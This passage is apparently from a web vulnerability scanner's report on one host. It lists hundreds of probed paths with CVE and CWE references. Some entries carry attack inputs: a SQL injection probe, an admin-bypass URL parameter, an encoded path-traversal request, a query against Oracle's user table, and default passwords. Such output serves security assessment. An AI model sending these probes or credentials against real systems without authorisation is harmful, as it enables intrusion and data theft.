See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /_vti_bin/admin.pl: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /_vti_bin/cfgwiz.exe: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /_vti_bin/CGImail.exe: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /_vti_bin/contents.htm: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /_vti_bin/fpadmin.htm: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /_vti_bin/fpremadm.exe: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /_vti_bin/fpsrvadm.exe: Default FrontPage CGI found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /_vti_bin/_vti_cnf/: FrontPage directory found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /_vti_cnf/_vti_cnf/: FrontPage directory found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /_vti_log/_vti_cnf/: FrontPage directory found. See: https://en.wikipedia.org/wiki/Microsoft_FrontPage + /help/contents.htm: Default Netscape manual found. All default pages should be removed. See: CWE-552 + /help/home.html: Default Netscape manual found. All default pages should be removed. See: CWE-552 + /manual/ag/esperfrm.htm: Default Netscape manual found. All default pages should be removed. See: CWE-552 + /nethome/: Netscape Enterprise Server default doc/manual directory. Reveals server path at bottom of page. See: CWE-552 + /com/novell/gwmonitor/help/en/default.htm: Netware gateway monitor access documentation found. All default documentation should be removed from web servers. See: CWE-552 + /com/novell/webaccess/help/en/default.htm: Netware web access documentation found. All default documentation should be removed from web servers. See: CWE-552 + /com/novell/webpublisher/help/en/default.htm: Netware web publisher documentation found. 
All default documentation should be removed from web servers. See: CWE-552 + /servlet/AdminServlet: Netware Web Search Server (adminservlet) found. All default code should be removed from web servers. See: CWE-552 + /servlet/gwmonitor: Netware Gateway monitor found. All default code should be removed from web servers. See: CWE-552 + /servlet/PrintServlet: Novell Netware default servlet found. All default code should be removed from the system. See: CWE-552 + /servlet/SearchServlet: Novell Netware default servlet found. All default code should be removed from the system. See: CWE-552 + /servlet/ServletManager: Netware Java Servlet Gateway found. Default user ID is servlet, default password is manager. All default code should be removed from Internet servers. See: CWE-552 + /servlet/sq1cdsn: Novell Netware default servlet found. All default code should be removed from the system. See: CWE-552 + /servlet/sqlcdsn: Netware SQL connector found. All default code should be removed from web servers. See: CWE-552 + /servlet/webacc: Netware Enterprise and/or GroupWise web access found. All default code should be removed from Internet servers. See: CWE-552 + /servlet/webpub: Netware Web Publisher found. All default code should be removed from web servers. See: CWE-552 + /WebSphereSamples: Netware Webshere sample applications found. All default code should be removed from web servers. See: CWE-552 + /index.html.ca: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.cz.iso8859-2: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.de: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. 
See: CWE-552 + /index.html.dk: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.ee: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.el: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.en: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.es: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.et: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.fr: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.he.iso8859-8: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.hr.iso8859-2: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.it: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. 
See: CWE-552 + /index.html.ja.iso2022-jp: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.kr.iso2022-kr: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.ltz.utf8: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.lu.utf8: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.nl: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.nn: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.no: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.po.iso8859-2: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.pt: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.pt-br: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. 
See: CWE-552 + /index.html.ru.cp-1251: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.ru.cp866: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.ru.iso-ru: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.ru.koi8-r: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.ru.utf8: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.se: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.tw: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.tw.Big5: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /index.html.var: Apache default foreign language file found. All default files should be removed from the web server as they may give an attacker additional system information. See: CWE-552 + /iissamples/sdk/asp/docs/codebrw2.asp: This is a default IIS script/file that should be removed. 
See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0739,https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013 + /iissamples/sdk/asp/docs/codebrws.asp: This is a default IIS script/file that should be removed. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0739,https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013 + /iissamples/sdk/asp/docs/Winmsdp.exe: This is a default IIS script/file that should be removed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0738. https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1451,https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013 + /a/: May be Kebi Web Mail administration menu. See: CWE-552 + /basilix/: BasiliX webmail application. Default mysql database name is 'BASILIX' with password 'bsxpass'. See: CWE-552 + /interchange/: Interchange chat is installed. Look for a high-numbered port like 20xx to find it running. See: CWE-552 + /uploader.php: This script may allow arbitrary files to be uploaded to the remote server. See: OSVDB-3282 + /conspass.chl+: Abyss allows hidden/protected files to be served if a + is added to the request. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1081 + /consport.chl+: Abyss allows hidden/protected files to be served if a + is added to the request. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1081 + /general.chl+: Abyss allows hidden/protected files to be served if a + is added to the request. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1081 + /srvstatus.chl+: Abyss allows hidden/protected files to be served if a + is added to the request. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1081 + /mlog.html: Remote file read vulnerability 1999-0068. 
See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0068 + /mlog.phtml: Remote file read vulnerability 1999-0068. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0068 + /php/mlog.html: Remote file read vulnerability 1999-0346. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0068 + /php/mlog.phtml: Remote file read vulnerability 1999-0346. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0068 + /soapConfig.xml: Oracle 9iAS configuration file found. See: http://www.securityfocus.com/bid/4290 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0568 https://securiteam.com/securitynews/5IP0B203PI/ + /XSQLConfig.xml: Oracle 9iAS configuration file found. See: http://www.securityfocus.com/bid/4290 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0568 https://securiteam.com/securitynews/5IP0B203PI/ + /surf/scwebusers: SurfControl SuperScout Web Reports Server user and password file is available. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0705 + /_private/form_results.htm: This file may contain information submitted by other web users via forms. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1052 + /_private/form_results.html: This file may contain information submitted by other web users via forms. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1052 + /_private/form_results.txt: This file may contain information submitted by other web users via forms. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1052 + /scripts/tools/getdrvrs.exe: MS Jet database engine can be used to make DSNs, useful with an ODBC exploit and the RDS exploit (with msadcs.dll) which mail allow command execution. See: http://attrition.org/security/advisory/individual/rfp/rfp.9901.nt_odbc + /project/index.php?m=projects&user_cookie=1: dotProject 0.2.1.5 may allow admin login bypass by adding the user_cookie=1 to the URL. 
See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1428 + /site/eg/source.asp: This ASP (installed with Apache::ASP) allows attackers to upload files to the server. Upgrade to 1.95 or higher. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0628 + /iissamples/exair/search/advsearch.asp: Scripts within the Exair package on IIS 4 can be used for a DoS against the server. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0449 + /isqlplus: Oracle iSQL*Plus is installed. This may be vulnerable to a buffer overflow in the user ID field. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1264 + /data/member_log.txt: Teekai's forum full 1.2 member's log can be retrieved remotely. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2057 + /data/userlog/log.txt: Teekai's Tracking Online 1.0 log can be retrieved remotely. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2058 + /userlog.php: Teekai's Tracking Online 1.0 log can be retrieved remotely. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-2058 + /ban.dat: Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected. See: OSVDB-4237 + /ban.log: Bannermatic versions 1-3 reveal sensitive information from unprotected files. These files should be protected. See: OSVDB-4237 + /admin/adminproc.asp: Xpede administration page may be available. The /admin directory should be protected. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0579 + /admin/datasource.asp: Xpede page reveals SQL account name. The /admin directory should be protected. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0579 + /utils/sprc.asp: Xpede page may allow SQL injection. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0579 + /texis.exe/?-dump: Texis installation may reveal sensitive information. See: OSVDB-4314 + /texis.exe/?-version: Texis installation may reveal sensitive information. 
See: OSVDB-4314 + /acart2_0/admin/category.asp?catcode=': Alan Ward A-Cart 2.0 is vulnerable to a SQL inject attack. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1873 + /Sites/Knowledge/Membership/Inspired/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0737,https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013 + /Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0737,https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013 + /Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0737,https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013 + /Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0737,https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013 + /Sites/Samples/Knowledge/Push/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0737,https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013 + /Sites/Samples/Knowledge/Search/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. 
See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0737,https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013 + /SiteServer/Publishing/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0737,https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013 + /siteserver/publishing/viewcode.asp?source=/default.asp: May be able to view source code using Site Server vulnerability. See: OSVDB-17671 + /securelogin/1,2345,A,00.html: Vignette Story Server v4.1, 6, may disclose sensitive information via a buffer overflow. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0385 + /config.inc: DotBr 0.1 configuration file includes usernames and passwords. See: OSVDB-5092 + /sysuser/docmgr/ieedit.stm?url=../: Sambar default file may allow directory listings. See: https://seclists.org/fulldisclosure/2003/Mar/265 + /sysuser/docmgr/iecreate.stm?template=../: Sambar default file may allow directory listings. See: https://seclists.org/fulldisclosure/2003/Mar/265 + /catinfo: May be vulnerable to a buffer overflow. Request '/catinfo?' and add on 2048 of garbage to test. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0432 + /MWS/HandleSearch.html?searchTarget=test&B1=Submit: MyWebServer 1.0.2 may be vulnerable to a buffer overflow (untested). Upgrade to a later version if 990b of searched data crashes the server. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1452 + /server-info: This gives a lot of Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts. See: https://www.invicti.com/web-vulnerability-scanner/vulnerabilities/apache-server-info-detected/ + /.nsconfig: Contains authorization information. See: OSVDB-5709 + /dc/auth_data/auth_user_file.txt: The DCShop installation allows credit card numbers to be viewed remotely. 
See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0821 https://packetstormsecurity.com/files/32406/xmas.txt.html + /dc/orders/orders.txt: The DCShop installation allows credit card numbers to be viewed remotely. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0821 https://packetstormsecurity.com/files/32406/xmas.txt.html + /cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html: HP Instant TopTools GoAhead WebServer hpnst.exe may be vulnerable to a DoS. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0169 + /applist.asp: Citrix server may allow remote users to view applications installed without authenticating. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0502 + /launch.asp?NFuse_Application=LookOut&NFuse_MIMEExtension=.ica: Citrix server may reveal sensitive information by accessing the 'advanced' tab on the login screen. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0301 + /_layouts/alllibs.htm: Microsoft SharePoint Portal and Team Services vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x. See: https://seclists.org/bugtraq/2003/Nov/226 + /_layouts/settings.htm: Microsoft SharePoint Portal and Team Services vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x. See: https://seclists.org/bugtraq/2003/Nov/226 + /_layouts/userinfo.htm: Microsoft SharePoint Portal and Team Services vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x. See: https://seclists.org/bugtraq/2003/Nov/226 + /stronghold-info: Redhat Stronghold from versions 2.3 up to 3.0 discloses sensitive information. This gives information on configuration. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0868 + /stronghold-status: Redhat Stronghold from versions 2.3 up to 3.0 discloses sensitive information. 
See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0868 + /iissamples/exair/howitworks/Code.asp: Scripts within the Exair package on IIS 4 can be used for a DoS against the server. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0449 + /iissamples/exair/howitworks/Codebrw1.asp: This is a default IIS script/file which should be removed, it may allow a DoS against the server. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0449 https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013 + /globals.jsa: Oracle globals.jsa file. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0562 + /iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp: IIS may be vulnerable to source code viewing via the example CodeBrws.asp file. Remove all default files from the web root. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0739 https://docs.microsoft.com/en-us/security-updates/securitybulletins/2099/MS99-013 + /pass_done.php: PY-Membres 4.2 may allow users to execute a query which generates a list of usernames and passwords. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1198 + /admin/admin.php?adminpy=1: PY-Membres 4.2 may allow administrator access. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-1198 + /j2ee/: j2ee directory found--possibly an Oracle app server directory. See: CWE-552 + /WebCacheDemo.html: Oracle WebCache Demo. See: CWE-552 + /webcache/: Oracle WebCache Demo. See: CWE-552 + /webcache/webcache.xml: Oracle WebCache Demo. See: CWE-552 + /bmp/: SQLJ Demo Application. See: CWE-552 + /bmp/global-web-application.xml: SQLJ Demo Application. See: CWE-552 + /bmp/JSPClient.java: SQLJ Demo Application. See: CWE-552 + /bmp/mime.types: SQLJ Demo Application. See: CWE-552 + /bmp/README.txt: SQLJ Demo Application. See: CWE-552 + /bmp/sqljdemo.jsp: SQLJ Demo Application. See: CWE-552 + /bmp/setconn.jsp: SQLJ Demo Application. 
See: CWE-552 + /ptg_upgrade_pkg.log: Oracle log files. See: CWE-552 + /OA_HTML/oam/weboam.log: Oracle log files. See: CWE-552 + /webapp/admin/_pages/_bc4jadmin/: Oracle JSP files. See: CWE-552 + /_pages/_webapp/_admin/_showpooldetails.java: Oracle JSP files. See: CWE-552 + /_pages/_webapp/_admin/_showjavartdetails.java: Oracle JSP file. See: CWE-552 + /_pages/_demo/: Oracle JSP file. See: CWE-552 + /_pages/_webapp/_jsp/: Oracle JSP file. See: CWE-552 + /_pages/_demo/_sql/: Oracle JSP file. See: CWE-552 + /OA_HTML/_pages/: Oracle JSP file. See: CWE-552 + /OA_HTML/webtools/doc/index.html: Cabo DHTML Components Help Page. See: CWE-552 + /reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF: Oracle Reports rwservlet report Variable Arbitrary Report Executable Execution. See: https://www.exploit-db.com/exploits/26006 + /apex/: Oracle Application Express login screen. See: CWE-552 + /OA_JAVA/: Oracle Applications Portal Page. See: CWE-552 + /OA_HTML/: Oracle Applications Portal Page. See: CWE-552 + /aplogon.html: Oracle Applications Portal Page. See: CWE-552 + /appdet.html: Oracle Applications Portal Pages. See: CWE-552 + /servlets/weboam/oam/oamLogin: Oracle Application Manager. See: CWE-552 + /OA_HTML/PTB/mwa_readme.htm: Oracle Mobile Applications Industrial Server administration and configuration interface. See: CWE-552 + /reports/rwservlet: Oracle Reports. See: CWE-552 + /reports/rwservlet/showenv: Oracle Reports. See: CWE-552 + /reports/rwservlet/showmap: Oracle Reports. See: CWE-552 + /reports/rwservlet/showjobs: Oracle Reports. See: CWE-552 + /reports/rwservlet/getjobid7?server=myrep: Oracle Reports. See: CWE-552 + /reports/rwservlet/getjobid4?server=myrep: Oracle Reports. See: CWE-552 + /reports/rwservlet/showmap?server=myserver: Oracle Reports. See: CWE-552 + /pls/portal/owa_util.cellsprint?p_theQuery=select: Direct access to Oracle packages could have an unknown impact. 
+ /pls/portal/owa_util.listprint?p_theQuery=select: Access to Oracle pages could have an unknown impact. + /pls/portal/owa_util.show_query_columns?ctable=sys.dba_users: Access to Oracle pages could have an unknown impact. + /pls/portal/owa_util.showsource?cname=owa_util: Access to Oracle pages could have an unknown impact. + /pls/portal/owa_util.cellsprint?p_theQuery=select+*+from+sys.dba_users: Access to Oracle pages could have an unknown impact. + /pls/portal/owa_util.signature: Access to Oracle pages could have an unknown impact. + /pls/portal/HTP.PRINT: Access to Oracle pages could have an unknown impact. + /pls/portal/CXTSYS.DRILOAD.VALIDATE_STMT: Access to Oracle pages could have an unknown impact. + /pls/portal/PORTAL_DEMO.ORG_CHART.SHOW: Access to Oracle pages could have an unknown impact. + /pls/portal/PORTAL.wwv_form.genpopuplist: Access to Oracle pages cold have an unknown impact. + /pls/portal/PORTAL.wwv_ui_lovf.show: Access to Oracle pages could have an unknown impact. + /pls/portal/PORTAL.wwv_dynxml_generator.show: Access to Oracle pages could have an unknown impact. + /pls/portal/PORTAL.home: Access to Oracle pages could have an unknown impact. + /pls/portal/PORTAL.wwv_main.render_warning_screen?p_oldurl=inTellectPRO&p_newurl=inTellectPRO: Access to Oracle pages could have an unknown impact. + /pls/portal/SELECT: Access to Oracle pages could have an unknown impact. + /pls/portal/null: Access to Oracle pages could have an unknown impact. + /OA_MEDIA/: Oracle Applications portal pages found. + /OA_HTML/META-INF/: Oracle Applications portal pages found. + /OA_HTML/jsp/por/services/login.jsp: Oracle Applications portal pages found. + /OA_HTML/PTB/ICXINDEXBASECASE.htm: Oracle Applications portal pages found. + /OA_HTML/PTB/ECXOTAPing.htm: Oracle Applications portal pages found. + /OA_HTML/PTB/xml_sample1.htm: Oracle Applications portal pages found. + /OA_HTML/jsp/wf/WFReassign.jsp: Oracle Applications portal pages found. 
+ /OA_JAVA/Oracle/: Oracle Applications portal pages found. + /OA_JAVA/servlet.zip: Oracle Applications portal pages found. + /OA_JAVA/oracle/forms/registry/Registry.dat: Oracle Applications portal pages found. + /OA_HTML/jsp/: Oracle Applications portal page found. See: CWE-552 + /OA_HTML/jsp/fnd/fndversion.jsp: Oracle Applications help page found. See: CWE-552 + /OA_HTML/jsp/fnd/fndhelp.jsp?dbc=/u01/oracle/prodappl/fnd/11.5.0/secure/dbprod2_prod.dbc: Oracle Applications help page found. See: CWE-552 + /OA_HTML/jsp/fnd/fndhelputil.jsp: Oracle Applications help page found. See: CWE-552 + /install/install.php: Install file found. + /cehttp/trace: Sterling Commerce Connect Direct trace log file may contain user ID information. + /cehttp/property/: Sterling Commerce Connect Direct configuration files. + /doc/icodUserGuide.pdf: Instant Capacity on Demand (iCOD) User's Guide. See: CWE-552 + /doc/planning_SuperDome_configs.pdf: Planning HP SuperDome Configurations. See: CWE-552 + /doc/vxvm/pitc_ag.pdf: VERITAS FlashSnapTM Point-In-Time Copy Solutions documentation. See: CWE-552 + /doc/Judy/Judy_tech_book.pdf: HP Judy documentation found. See: CWE-552 + /doc/vxvm/vxvm_ag.pdf: Veritas Volume Manager documentation. See: CWE-552 + /doc/vxvm/vxvm_hwnotes.pdf: Veritas Volume Manager documentation. See: CWE-552 + /doc/vxvm/vxvm_ig.pdf: Veritas Volume Manager documentation. See: CWE-552 + /doc/vxvm/vxvm_mig.pdf: Veritas Volume Manager documentation. See: CWE-552 + /doc/vxvm/vxvm_tshoot.pdf: Veritas Volume Manager documentation. See: CWE-552 + /doc/vxvm/vxvm_notes.pdf: Veritas Volume Manager documentation. See: CWE-552 + /doc/vxvm/vxvm_ug.pdf: Veritas Volume Manager documentation. See: CWE-552 + /staging/: This might be interesting. + /_archive/: Archive found. + /wsman/: Windows Remote Management is enabled. 
+ 8073 requests: 0 error(s) and 612 item(s) reported on remote host + End Time: 2024-11-29 17:39:34 (GMT-5) (34 seconds) --------------------------------------------------------------------------- + 1 host(s) tested